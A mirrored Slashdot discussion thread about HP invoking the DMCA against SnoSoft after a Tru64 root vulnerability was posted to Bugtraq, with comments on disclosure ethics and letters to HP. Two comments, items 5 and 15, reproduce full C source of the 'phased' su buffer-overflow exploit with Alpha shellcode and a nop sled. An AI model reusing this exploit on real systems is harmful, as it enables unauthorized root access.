Slashdot Mirror


HP Uses DMCA To Quash Vulnerability Publication

Several readers wrote in to note that HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft, who found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."

20 of 603 comments

  1. Excerpt from the CNet article by zaren · Score: 3, Interesting

    "On July 19, a researcher at SnoSoft posted a note to SecurityFocus.com's popular Bugtraq mailing list with a hyperlink to a computer program letting a Tru64 user gain full administrator privileges. The researcher, who goes by the alias 'Phased,' said in the message: 'Here is the warez, nothing special, but it does the job.'"

    Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way. If this was announced in a different way, like say a formal research group contacting the company privately with test results, instead of just some random person posting under an alias to an open list like BugTraq, things might be different.

    --
    Come to the University of Mars! Classes starting soon!
    1. Re:Excerpt from the CNet article by dnoyeb · Score: 4, Interesting

      Yes, HP could possibly assume the exploit is not totally public. As it stands, some random Joe posting an exploit says the exploit is mainstream by now...

  2. as a Tru64 admin... by Corgha · Score: 4, Interesting

    This is just another reason to say "fuck you, the new HP" and run faster to Linux and *BSD. Admittedly, anyone who has recently had to compare the price of an ES40 and an equivalent amount of Intel-compatible compute is probably already heading there...

    Still, this sort of head-in-the-sand response to security vulnerabilities is not a good way to make happy customers. Obviously, the exploit exists; what HP apparently wants to do is make sure that it only gets passed around on IRC so that admins can get completely blindsided.

    Of course, Compaq already killed the Alpha, and don't get me started on their support contracts (OK, so they inherited those). It's almost as if they don't want customers (well, DigitalUNIX/Tru64 customers probably *are* a bit of a pain in the ass, compared to MCSEs).

    It's just sad to see the last bits of the carcass of what was once a pretty cool company (DEC) get so abused.

  3. So This is the, "New HP?" by ewhac · Score: 4, Interesting

    HP Classic would never have pulled a stunt like this. They would have gone, "Oops, my bad, here's a bugfix everyone."

    As time goes on, it looks more and more as if Walter Hewlett and David Packard were right: This whole "New HP" thing is just so much hogwash.

    Schwab

  4. Re:let me see if I get this right by xigxag · Score: 3, Interesting

    HP should be thanking them

    This is a bad thing for HP. The thing is, hackers love to share their code with the world. And there are two ways to exploit that obsessive desire, either through good (white hat) mechanisms or through bad (cracker) mechanisms. If HP prevents hackers from researching exploits in a legitimate fashion, it won't stop the hackers -- they'll just leak their hacks onto Eastern European warez websites outside of the reach of US law. HP won't be aware of anything until it's too late and millions of dollars of damage have already been done by malicious parties. It's like that old saw about gun ownership: When hacking software is a crime then only criminals will hack your software.

    --
    There are two kinds of people: 1) those who start arrays with one and 1) those who start them with zero.
  5. Do you mean this source code? by User+956 · Score: 4, Interesting

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <strings.h>   /* bzero() */
    #include <unistd.h>

    /* Alpha machine code, as posted; only meaningful on Tru64/Alpha */
    char shellcode[]= "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47" "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";

    int main(int argc, char *argv[]) {
        int i, j; char buffer[8239]; char payload[15200];
        char nop[] = "\x1f\x04\xff\x47";   /* one 4-byte Alpha no-op instruction */
        (void)argc; (void)argv;
        bzero(buffer, sizeof(buffer)); bzero(payload, sizeof(payload));
        for (i = 0; i < 8233; i++) buffer[i] = 0x41;   /* 'A' padding */

        /* 0x140010401, least-significant byte first (Alpha is little-endian) */
        buffer[i++] = 0x01; buffer[i++] = 0x04;
        buffer[i++] = 0x01; buffer[i++] = 0x40;
        buffer[i++] = 0x01;

        /* nop sled, then the shellcode (sizeof includes the terminating NUL) */
        for (i = 0; i < 15000;) { for (j = 0; j < 4; j++) { payload[i++] = nop[j]; } }
        for (j = 0; j < (int)sizeof(shellcode); i++, j++) payload[i] = shellcode[j];
        printf("/bin/su by phased\n");
        printf("payload %db\n", (int)strlen(payload));
        printf("buffer %db\n", (int)strlen(buffer));
        execl("/usr/bin/su", "su", buffer, payload, (char *)0);   /* null-pointer terminator, not plain 0 */
        return 1;   /* reached only if execl() fails */
    }

    --
    The theory of relativity doesn't work right in Arkansas.
  6. Re:DMCA Violation? by buss_error · Score: 4, Interesting

    And if everyone involved has the guts to go ahead and let a jury decide, we might ALL be better off.

    It is one thing for a MegaCorp to slam down a few million on litigation, it's another for me to pay to fight it. Am I really willing to go to the poor house over this issue? Am I really willing to throw away a fair job, an OK home, and my car?

    The problem in the US is that justice is bought and paid for. If you don't have the cash, you are part of the trash. Trash gets swept up. No, the only real effective course of action is to start bitching to office seekers and to stop paying for Intellectual Property. Swap CDs, swap DVDs, for God's sake read a book from the library. But don't shell out bucks for IP anymore. The profit they make is part of the club they are using against us.

    If no one purchased what Sony is selling, how long do you think Sony would stay in business? If we boycott RIAA members, how long would it be until Ms. Rosen had to go earn an honest living?

    Look, it's not a problem if you fall off the wagon. Just take the amount of money you spent on that CD, movie or DVD and send a like amount to the EFF.

    OK, so I'm a broken record.

    --
    Necessity is the plea for every infringement of human freedom. It is the argument of tyrants; it is the creed of slaves.
  7. Subtle attack on the DMCA? by aebrain · Score: 3, Interesting

    Perhaps HP - having stopped Bruce Perens from protesting against the DMCA via civil disobedience - is attacking it via a reductio ad absurdum method. i.e. Showing exactly how it violates the principles of Free Speech. It's officially illegal to state that the Emperor has no clothes.

    --
    Zoe Brain - Rocket Scientist
  8. Dear Ms. Fiorina by Gerdts · Score: 5, Interesting

    Posted at http://www.hp.com/hpinfo/execteam/email/fiorina/index.htm

    I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-million dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.

    The first issue is HP's request that Bruce Perens not present his findings on DVD copyright controls. If he is acting on his own behalf, and includes a disclaimer that this is a separate issue from what he does under the employment of HP, he should be allowed to go forth. If he is presenting HP intellectual property, HP has the right and responsibility to protect itself. This, however, does not seem to be the case.

    The more disturbing issue is with regards to the handling of SnoSoft's publication of root exploits to the Tru64 operating system. As a UNIX administrator, I am responsible for researching technologies that I will put into production. Many times, these products are used to protect the intellectual property, stability, or other things that are of great importance to my employer's success and my career. If security researchers cannot force many of the bugs out in the open before I evaluate products, I have much more work on my hands. Furthermore, if I find a bug that I know can be used to compromise my system, without the ability to publicly discuss and disclose the bug, I may be unable to get a fix from the vendor or a home-grown workaround. If I am at the complete mercy of my vendors' good will, I fear that I will have a system that lacks stability and security.

    Please reconsider your decision to use the Digital Millennium Copyright Act to stifle free speech. Once you come to the realization that the DMCA is not a law that is useful for HP, please put your lobbying efforts into repealing it and push for funding to enforce pre-DMCA laws that already provide more than adequate protections on copyright and other intellectual property issues.

    I do not speak for my employer. Please remember, however, that my employer trusts me to make decisions that are in the employer's best interest. Your actions suggest that the purchase of HP products is in the best interest of no employer that I would work for.

  9. Re:Bruce, it's time for you to make a decision by ChaosDiscord · Score: 5, Interesting

    I just wish people would stop believing that any company exists for any reason other than to increase the wealth of its shareholders. Sorry folks, this is just the American way.

    The American way is the right to Life, Liberty, and the pursuit of Happiness. The American way is that no law shall abridge freedom of speech or of the press.

    "The only law shalt be maximize your stock price at all costs" is part of something worse. It isn't even part of the Capitalist way, for true capitalism only works with wide availability of information and strong competition. This is the inbred freak son of Capitalism and Greed. This is the way of life of scam artists, shysters, hucksters, thieves. This is the Monopolist's Way.

    I understand perfectly well that "thou shalt increase your stock price or face lawsuits," but I don't have to like it. It's a corruption of everything America, freedom, and true capitalism. I have every right to name it beast and call for it to be cast into the fires.

  10. My mail to Carly by CrayDrygu · Score: 4, Interesting

    Mrs Fiorina,

    I work for a retailer -- Best Buy -- which sells a large volume of HP and Compaq products. I have long been a fan of Hewlett Packard, but some recent news is troubling me.

    Kent Ferson's reaction to Phased's posting of the security vulnerability in Tru64 was nothing short of shockingly irresponsible.

    Not only am I disturbed that there was no statement of any intent to fix the security hole, but I am shocked at the threat of a lawsuit under the DMCA. You should be grateful that the hole was brought to your attention before it became a widespread problem, not to mention that had you fixed it in a timely manner (as the hole was revealed to you by SnoSoft last year), this would never have been a problem.

    This reaction tells me that not only is HP/Compaq concerned more with their image than with ensuring the quality of their products, but that "The New HP" would rather abuse copyright law by "shooting the messenger" than issue a responsible statement, and repair an error before it becomes a problem.

    I'll be waiting in the next few days for a press release or some other statement denouncing Mr. Ferson's actions, and showing that HP has plans to repair the hole in Tru64. Until this happens, I'm not sure I'll be able to recommend that anyone give their money to Hewlett Packard.

    Looking forward to your response.

    [Name Removed]

    --
    "I personal[ly] think Unix is "superior" because on LSD it tastes like Blue." -- jbarnett

  11. This is a marketing disaster for HP. by Futurepower(R) · Score: 5, Interesting

    Bruce, if I were president of HP, I would immediately fire Kent Ferson, the vice president who wrote the letter. The letter says, basically, that HP is not able to fix the problem, and would rather hide its security problems.

    This is a marketing disaster for HP. Probably Mr. Ferson has little technical knowledge and does not realize that his letter speaks loudly and clearly to the whole world of technically knowledgeable people, and does irreparable damage to HP.

    We live in an amazing world where free products are better than expensive ones. The open source response to a security problem is to have a bug fix on all the mirrors in 48 hours. The response of billion dollar companies with tens of thousands of well-paid employees is to try to weasel out of doing the right thing. Who would have guessed it would be that way?

    It seems that you could do HP a big favor if you could educate top management. But maybe they are not educable.

    1. Re:This is a marketing disaster for HP. by Bruce+Perens · Score: 5, Interesting

      Let's not get draconian yet, it could be correcting a wrong with another wrong. Maybe an apology is what is necessary, and perhaps that would teach a better lesson to all involved. But I can't say what is necessary until I see full data. All I have tonight are news reports.

      Bruce

  12. Re:Bruce Perens by Bruce+Perens · Score: 4, Interesting

    I just woke up my boss and am in email correspondence with various other people. Obviously, a lot of the people involved are going to be unavailable until tomorrow morning.

    My terms of employment with HP allow me to publicly criticise the company when necessary. I'd rather help them fix the problem so that the criticism is all in the past tense, but the criticism will come if necessary. All I have to go on tonight is news reports.

    Thanks

    Bruce

  13. I need your call on this, please, folks. by Bruce+Perens · Score: 4, Interesting

    Folks,

    In my investigation, I read the Snosoft home page. This is the second sentence of their introductory paragraph:

    Our advisory release policy is full disclosure unless bound by contract.

    Now, I don't know any of the people involved or how they really do business, and thus I am not ready to make any allegations. But that sentence sounds a bit like a shakedown, doesn't it?

    I would hate to be manipulated in a shakedown of my own company.

    On the other hand, some people say this is a year-old bug and that there was long correspondence before one of the employees finally revealed it. I don't know if that's true yet.

    What do you think?

    Bruce

    1. Re:I need your call on this, please, folks. by Bruce+Perens · Score: 5, Interesting

      I read "full disclosure unless bound by contract" as "full disclosure unless you pay us to hide what we found". If I had written that page, I would have spun that line differently. I don't yet know if my (admittedly paranoid) interpretation represents the way they operate, or not.

      Bruce

    2. Re:I need your call on this, please, folks. by _Sprocket_ · Score: 3, Interesting

      It looks like that text has been removed - at least, I don't notice it at that URL (or during a cursory search through the site). Having said that - this does put forward an interesting question.

      How are contracted researchers expected to behave in such a situation?

      It seems that the usual "full disclosure" notice comes from an audit of a product by an external group / individual without contract or invitation by the producer of that product (publicity-grabbing "hacker challenges" aside). Such reports certainly warn the product's user base. But they also seem to be an attempt to embarrass the producer of that product into action - patching the current issue and perhaps increasing future quality control.

      What if the research group is hired by WidgetSoft to audit the Widget2000 and they discover a major vulnerability? It is unlikely the public will ever hear of it from the research group. WidgetSoft will likely develop the patch, and release it with their own report based on the research group's findings.

      But what if WidgetSoft decides to bury the findings? Then our hypothetical research group has a dilemma. It would be wise for this group to be sure their business contract specifically avoids conflicting with their morals.

      Unless, of course, they're in the business of the shake-down.

  14. Re:Bruce Perens by Bruce+Perens · Score: 5, Interesting

    People really resist the phone. Lots will reply to me here. A few will email. None will call. No kidding. That number has been on my web page for a year, and the calls I get are from the press, and the occasional Nigerian money-laundering scam.

    Bruce

  15. Let's try this again... by User+956 · Score: 5, Interesting

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <strings.h>   /* bzero() */
    #include <unistd.h>

    /* Alpha machine code, as posted; only meaningful on Tru64/Alpha */
    char shellcode[] =
    "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47"
    "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";

    int main(int argc, char *argv[]) {
        int i, j;
        char buffer[8239];                /* first argument handed to su */
        char payload[15200];              /* second argument: nop sled, then shellcode */
        char nop[] = "\x1f\x04\xff\x47";  /* one 4-byte Alpha no-op instruction */

        (void)argc;
        (void)argv;
        bzero(buffer, sizeof(buffer));
        bzero(payload, sizeof(payload));

        for (i = 0; i < 8233; i++)
            buffer[i] = 0x41;             /* 'A' padding */

        /* 0x140010401, least-significant byte first (Alpha is little-endian) */
        buffer[i++] = 0x01;
        buffer[i++] = 0x04;
        buffer[i++] = 0x01;
        buffer[i++] = 0x40;
        buffer[i++] = 0x01;

        for (i = 0; i < 15000;) {
            for (j = 0; j < 4; j++) {
                payload[i++] = nop[j];
            }
        }

        /* sizeof(shellcode) includes the terminating NUL, so payload stays a C string */
        for (j = 0; j < (int)sizeof(shellcode); i++, j++)
            payload[i] = shellcode[j];

        printf("/bin/su by phased\n");
        printf("payload %db\n", (int)strlen(payload));
        printf("buffer %db\n", (int)strlen(buffer));

        /* execl() needs a null-pointer terminator, not a plain int 0 */
        execl("/usr/bin/su", "su", buffer, payload, (char *)0);
        return 1;   /* reached only if execl() fails */
    }

    --
    The theory of relativity doesn't work right in Arkansas.
  16. Re:Bruce Perens by 0xA · Score: 4, Interesting

    Bruce,

    I plan to call you tomorrow and follow this up with an email but I imagine both your inbox and telephone line are going to be jammed tomorrow so I will post as well. These are my comments on the situation and my reaction as a customer.

    I have been working with Compaq and HP systems my entire career, Intel based servers, UNIX servers and workstations, printer and software. Working as a retail reseller, VAR and customer I have recommended the purchase of HP and Compaq systems many times in the past and am now in a position to have final authority on what systems are purchased for my company. Our entire infrastructure is based on HP and Compaq products.

    As a customer I must trust my vendors to act quickly and responsibly to give me the tools and information I need to keep my systems secure. Timely, complete vulnerability information and patches are critical to my success here. There is no framework, process or authority that provides for the responsible publication of this information, and given the nature of many of the parties involved I doubt there can ever be a comprehensive solution. When a third party (outside of vendor and customer) finds a problem with a piece of software and decides to act irresponsibly, the situation gets complicated; the Apache Foundation's problems last month are an example of this. From the news reports on news.com today I believe HP currently finds itself in a similar situation. The information I have been able to find does not paint SnoSoft or their member "Phased" in a good light; I suspect that the group has acted in bad faith or at least "Phased" has acted irresponsibly in the matter. I do not pass judgment on HP's actions in producing a solution for this problem.

    However, the comments of Kent Ferson as reported on news.com concern me greatly. By threatening the use of the DMCA or any other criminal statute in this matter, Mr. Ferson has turned the security community on its head. HP's position as a market leader could go a long way to setting this as a precedent in the industry and law, the results of which could be devastating. While I recognize the importance of a group like SnoSoft working with a vendor to coordinate their disclosure with a vendor's fix, this also has to happen in an efficient manner. The chance that SnoSoft has discovered a problem that others know about or are exploiting cannot be ignored. The potential harm that can come from using criminal charges to frustrate or slow this process is hard to express. The responsibility for ensuring my company's systems are secure is mine; I must have the information I need to make responsible decisions on security. If this means removing systems from service until I can secure them, then that is what I will do.

    Regardless of the events leading to Mr. Ferson's letter to SnoSoft, HP must clarify their position on this situation. I would hope that you are willing to state that, provided no illegal methods were used to discover the vulnerability, HP will not pursue criminal prosecution of researchers. If SnoSoft or Phased has acted in bad faith or breach of contract, it is a matter for the civil courts.

    Aaron Schneider
    Manager, Information Technology
    Fabutan Sun Tan Studios
    Schneider@fabutan.com